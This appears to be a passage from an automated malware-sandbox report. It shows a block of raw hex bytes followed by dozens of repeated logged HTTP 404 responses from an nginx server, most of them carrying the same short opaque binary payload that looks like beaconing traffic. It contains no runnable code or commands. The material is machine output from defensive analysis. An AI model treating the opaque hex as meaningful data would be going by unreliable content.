68 6d 62 d8 3d 26 f2 ae 17 92 e7 31 94 9e 14 71 df 56 4b 4d fb d1 eb eb 15 5f 59 75 b0 88 df 17 cb da 16 5c 7a 65 b3 06 0d 22 ac c5 bd ab 2a 78 dd c5 29 5d 04 68 0c ed 53 3e ae ed 2b d1 da 4d dc 69 f2 9c 8b 16 ce ca 54 22 35 56 b2 f7 7c bb b2 3c 82 12 fd 31 8a 0f dd d6 e1 d1 b0 92 46 58 2a 23 aa 9a 57 1a 4e 33 87 54 73 ad 60 66 9a 65 2b d7 aa 6c e7 d3 3f 34 b7 5c cd ff de 79 36 2c 56 90 b1 e8 06 cf a3 8e 8c 52 62 8e 99 91 37 38 ee 33 da 0a d6 d4 b9 50 93 be 72 50 e6 05 91 2f 5c a3 15 81 e5 2d 3e db d8 56 9c 5c ca 76 ad 0f cb a4 ac 06 27 be e3 95 af 7d 8d c8 f8 d5 a2 ac 79 42 e4 2a fe bb 77 5c 6d 7f 0b 0c ed 14 66 bc b9 7d df 83 28 8a 44 11 d3 27 6a 09 89 48 b6 fe ee e5 d4 81 be 69 64 a2 60 8a 9f ef 46 d7 a7 c8 b4 26 85 92 95 c7 bf d9 8e e7 b0 34 46 33 97 61 40 b1 6e c8 45 e3 ac 35 16 04 36 92 e4 74 ad 39 62 0c bf 97 47 d2 09 86 e0 9c 59 a0 de 3a 1c 17 38 7c 5f 3e bb aa 70 fc 0a 0c 14 0a 5b 85 13 dd 96 9c e8 ad f0 dc ec 1f de d5 94 e6 d0 22 4e 7b 62 68 85 cd e0 ca d1 06 f1 14 a7 e8 64 5d 22 31 4e b5 c6 96 1f 64 ea 41 fd fc 9c b3 6a a7 64 71 4b 72 85 e9 1f 4d 21 f7 a5 af 36 ee 6b ff 37 ec 90 f5 7c d6 9e 2e fe e2 16 c9 d3 a7 69 70 cb dc 9e 7f fe 2b 45 1f 08 e9 19 4d c9 ca 3e 23 46 f4 ec e5 12 76 fc 05 28 0e 90 74 a1 ac fd 03 db ee e2 a1 95 17 78 e6 31 b7 dd 43 20 06 a5 51 89 5b 52 dc a0 b6 3c 93 43 6a 8a a3 49 da 3c be e4 53 f2 5b 95 7e db c9 4e 3c ef c7 b9 fc 9a 1f 19 68 27 33 b9 7f e3 12 54 d3 a2 0f 3e 35 55 5b ab 85 b1 03 eb 9a 93 b5 c5 3b af 62 ad f7 73 ae fa 9a 21 5f a0 83 3b 62 f0 1c 92 ee 33 57 97 99 26 65 ad 4d 3f 70 a8 48 6b 5f 5a 39 87 68 66 ac d8 4b 02 fd 69 3e 9d 69 6f 78 e9 0c 12 20 c5 dd 59 d4 a0 d3 b2 53 92 1c 0a 76 11 83 69 59 cd f1 3a 8f bd 5e 83 cd d4 78 30 cb b0 30 47 be 3a 05 68 a3 c3 8c cf b2 bd 1b 62 2c 59 31 79 1d 87 8e c9 da ac b8 a9 7e 44 32 a5 83 47 c3 29 00 be cd 29 9d ee c6 c1 c0 77 c6 25 05 3c 5f 3f 68 48 f9 ef 63 d8 fb 8b 66 79 c3 c1 91 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:34:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 150<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:35:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
